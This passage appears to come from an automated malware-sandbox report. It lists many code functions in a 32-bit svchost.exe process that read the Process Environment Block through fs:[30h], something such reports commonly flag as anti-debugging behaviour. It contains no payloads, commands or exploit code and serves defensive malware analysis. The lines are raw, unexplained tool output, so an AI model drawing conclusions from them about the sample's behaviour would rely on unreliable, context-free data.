Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_035062D6 mov eax, dword ptr fs:[00000030h]	6_2_035062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034402E1 mov eax, dword ptr fs:[00000030h]	6_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034402E1 mov eax, dword ptr fs:[00000030h]	6_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034402E1 mov eax, dword ptr fs:[00000030h]	6_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E284 mov eax, dword ptr fs:[00000030h]	6_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E284 mov eax, dword ptr fs:[00000030h]	6_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B0283 mov eax, dword ptr fs:[00000030h]	6_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B0283 mov eax, dword ptr fs:[00000030h]	6_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B0283 mov eax, dword ptr fs:[00000030h]	6_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034402A0 mov eax, dword ptr fs:[00000030h]	6_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034402A0 mov eax, dword ptr fs:[00000030h]	6_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C62A0 mov eax, dword ptr fs:[00000030h]	6_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C62A0 mov ecx, dword ptr fs:[00000030h]	6_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C62A0 mov eax, dword ptr fs:[00000030h]	6_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C62A0 mov eax, dword ptr fs:[00000030h]	6_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C62A0 mov eax, dword ptr fs:[00000030h]	6_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C62A0 mov eax, dword ptr fs:[00000030h]	6_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C4144 mov eax, dword ptr fs:[00000030h]	6_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C4144 mov eax, dword ptr fs:[00000030h]	6_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C4144 mov ecx, dword ptr fs:[00000030h]	6_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C4144 mov eax, dword ptr fs:[00000030h]	6_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C4144 mov eax, dword ptr fs:[00000030h]	6_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342C156 mov eax, dword ptr fs:[00000030h]	6_2_0342C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C8158 mov eax, dword ptr fs:[00000030h]	6_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03436154 mov eax, dword ptr fs:[00000030h]	6_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03436154 mov eax, dword ptr fs:[00000030h]	6_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03504164 mov eax, dword ptr fs:[00000030h]	6_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03504164 mov eax, dword ptr fs:[00000030h]	6_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h]	6_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE10E mov ecx, dword ptr fs:[00000030h]	6_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h]	6_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h]	6_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE10E mov ecx, dword ptr fs:[00000030h]	6_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h]	6_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h]	6_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE10E mov ecx, dword ptr fs:[00000030h]	6_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h]	6_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE10E mov ecx, dword ptr fs:[00000030h]	6_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DA118 mov ecx, dword ptr fs:[00000030h]	6_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DA118 mov eax, dword ptr fs:[00000030h]	6_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DA118 mov eax, dword ptr fs:[00000030h]	6_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DA118 mov eax, dword ptr fs:[00000030h]	6_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F0115 mov eax, dword ptr fs:[00000030h]	6_2_034F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03460124 mov eax, dword ptr fs:[00000030h]	6_2_03460124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F61C3 mov eax, dword ptr fs:[00000030h]	6_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F61C3 mov eax, dword ptr fs:[00000030h]	6_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	6_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	6_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]	6_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	6_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	6_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_035061E5 mov eax, dword ptr fs:[00000030h]	6_2_035061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034601F8 mov eax, dword ptr fs:[00000030h]	6_2_034601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03470185 mov eax, dword ptr fs:[00000030h]	6_2_03470185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034EC188 mov eax, dword ptr fs:[00000030h]	6_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034EC188 mov eax, dword ptr fs:[00000030h]	6_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D4180 mov eax, dword ptr fs:[00000030h]	6_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D4180 mov eax, dword ptr fs:[00000030h]	6_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B019F mov eax, dword ptr fs:[00000030h]	6_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B019F mov eax, dword ptr fs:[00000030h]	6_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B019F mov eax, dword ptr fs:[00000030h]	6_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B019F mov eax, dword ptr fs:[00000030h]	6_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342A197 mov eax, dword ptr fs:[00000030h]	6_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342A197 mov eax, dword ptr fs:[00000030h]	6_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342A197 mov eax, dword ptr fs:[00000030h]	6_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03432050 mov eax, dword ptr fs:[00000030h]	6_2_03432050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B6050 mov eax, dword ptr fs:[00000030h]	6_2_034B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345C073 mov eax, dword ptr fs:[00000030h]	6_2_0345C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B4000 mov ecx, dword ptr fs:[00000030h]	6_2_034B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]	6_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]	6_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]	6_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]	6_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]	6_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]	6_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]	6_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]	6_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344E016 mov eax, dword ptr fs:[00000030h]	6_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344E016 mov eax, dword ptr fs:[00000030h]	6_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344E016 mov eax, dword ptr fs:[00000030h]	6_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344E016 mov eax, dword ptr fs:[00000030h]	6_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342A020 mov eax, dword ptr fs:[00000030h]	6_2_0342A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342C020 mov eax, dword ptr fs:[00000030h]	6_2_0342C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C6030 mov eax, dword ptr fs:[00000030h]	6_2_034C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B20DE mov eax, dword ptr fs:[00000030h]	6_2_034B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]	6_2_0342A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034380E9 mov eax, dword ptr fs:[00000030h]	6_2_034380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B60E0 mov eax, dword ptr fs:[00000030h]	6_2_034B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342C0F0 mov eax, dword ptr fs:[00000030h]	6_2_0342C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034720F0 mov ecx, dword ptr fs:[00000030h]	6_2_034720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343208A mov eax, dword ptr fs:[00000030h]	6_2_0343208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034280A0 mov eax, dword ptr fs:[00000030h]	6_2_034280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C80A8 mov eax, dword ptr fs:[00000030h]	6_2_034C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F60B8 mov eax, dword ptr fs:[00000030h]	6_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F60B8 mov ecx, dword ptr fs:[00000030h]	6_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346674D mov esi, dword ptr fs:[00000030h]	6_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346674D mov eax, dword ptr fs:[00000030h]	6_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346674D mov eax, dword ptr fs:[00000030h]	6_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03430750 mov eax, dword ptr fs:[00000030h]	6_2_03430750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BE75D mov eax, dword ptr fs:[00000030h]	6_2_034BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472750 mov eax, dword ptr fs:[00000030h]	6_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472750 mov eax, dword ptr fs:[00000030h]	6_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B4755 mov eax, dword ptr fs:[00000030h]	6_2_034B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03438770 mov eax, dword ptr fs:[00000030h]	6_2_03438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346C700 mov eax, dword ptr fs:[00000030h]	6_2_0346C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03430710 mov eax, dword ptr fs:[00000030h]	6_2_03430710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03460710 mov eax, dword ptr fs:[00000030h]	6_2_03460710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346C720 mov eax, dword ptr fs:[00000030h]	6_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346C720 mov eax, dword ptr fs:[00000030h]	6_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346273C mov eax, dword ptr fs:[00000030h]	6_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346273C mov ecx, dword ptr fs:[00000030h]	6_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346273C mov eax, dword ptr fs:[00000030h]	6_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AC730 mov eax, dword ptr fs:[00000030h]	6_2_034AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343C7C0 mov eax, dword ptr fs:[00000030h]	6_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B07C3 mov eax, dword ptr fs:[00000030h]	6_2_034B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034527ED mov eax, dword ptr fs:[00000030h]	6_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034527ED mov eax, dword ptr fs:[00000030h]	6_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034527ED mov eax, dword ptr fs:[00000030h]	6_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BE7E1 mov eax, dword ptr fs:[00000030h]	6_2_034BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034347FB mov eax, dword ptr fs:[00000030h]	6_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034347FB mov eax, dword ptr fs:[00000030h]	6_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D678E mov eax, dword ptr fs:[00000030h]	6_2_034D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034307AF mov eax, dword ptr fs:[00000030h]	6_2_034307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E47A0 mov eax, dword ptr fs:[00000030h]	6_2_034E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344C640 mov eax, dword ptr fs:[00000030h]	6_2_0344C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F866E mov eax, dword ptr fs:[00000030h]	6_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F866E mov eax, dword ptr fs:[00000030h]	6_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346A660 mov eax, dword ptr fs:[00000030h]	6_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346A660 mov eax, dword ptr fs:[00000030h]	6_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03462674 mov eax, dword ptr fs:[00000030h]	6_2_03462674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AE609 mov eax, dword ptr fs:[00000030h]	6_2_034AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]	6_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]	6_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]	6_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]	6_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]	6_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]	6_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]	6_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472619 mov eax, dword ptr fs:[00000030h]	6_2_03472619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344E627 mov eax, dword ptr fs:[00000030h]	6_2_0344E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03466620 mov eax, dword ptr fs:[00000030h]	6_2_03466620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03468620 mov eax, dword ptr fs:[00000030h]	6_2_03468620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343262C mov eax, dword ptr fs:[00000030h]	6_2_0343262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]	6_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346A6C7 mov eax, dword ptr fs:[00000030h]	6_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	6_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	6_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	6_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	6_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B06F1 mov eax, dword ptr fs:[00000030h]	6_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B06F1 mov eax, dword ptr fs:[00000030h]	6_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03434690 mov eax, dword ptr fs:[00000030h]	6_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03434690 mov eax, dword ptr fs:[00000030h]	6_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346C6A6 mov eax, dword ptr fs:[00000030h]	6_2_0346C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034666B0 mov eax, dword ptr fs:[00000030h]	6_2_034666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03438550 mov eax, dword ptr fs:[00000030h]	6_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03438550 mov eax, dword ptr fs:[00000030h]	6_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346656A mov eax, dword ptr fs:[00000030h]	6_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346656A mov eax, dword ptr fs:[00000030h]	6_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346656A mov eax, dword ptr fs:[00000030h]	6_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C6500 mov eax, dword ptr fs:[00000030h]	6_2_034C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]	6_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]	6_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]	6_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]	6_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]	6_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]	6_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]	6_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]	6_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]	6_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]	6_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]	6_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]	6_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]	6_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]	6_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]	6_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]	6_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]	6_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]	6_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E5CF mov eax, dword ptr fs:[00000030h]	6_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E5CF mov eax, dword ptr fs:[00000030h]	6_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034365D0 mov eax, dword ptr fs:[00000030h]	6_2_034365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034325E0 mov eax, dword ptr fs:[00000030h]	6_2_034325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346C5ED mov eax, dword ptr fs:[00000030h]	6_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346C5ED mov eax, dword ptr fs:[00000030h]	6_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03432582 mov eax, dword ptr fs:[00000030h]	6_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03432582 mov ecx, dword ptr fs:[00000030h]	6_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03464588 mov eax, dword ptr fs:[00000030h]	6_2_03464588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E59C mov eax, dword ptr fs:[00000030h]	6_2_0346E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B05A7 mov eax, dword ptr fs:[00000030h]	6_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B05A7 mov eax, dword ptr fs:[00000030h]	6_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B05A7 mov eax, dword ptr fs:[00000030h]	6_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034545B1 mov eax, dword ptr fs:[00000030h]	6_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034545B1 mov eax, dword ptr fs:[00000030h]	6_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]	6_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]	6_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]	6_2_0346E443
